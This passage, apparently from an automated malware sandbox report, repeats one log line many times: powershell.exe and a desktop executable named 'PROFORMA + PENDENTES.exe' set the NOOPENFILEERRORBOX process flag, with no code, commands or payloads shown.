              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
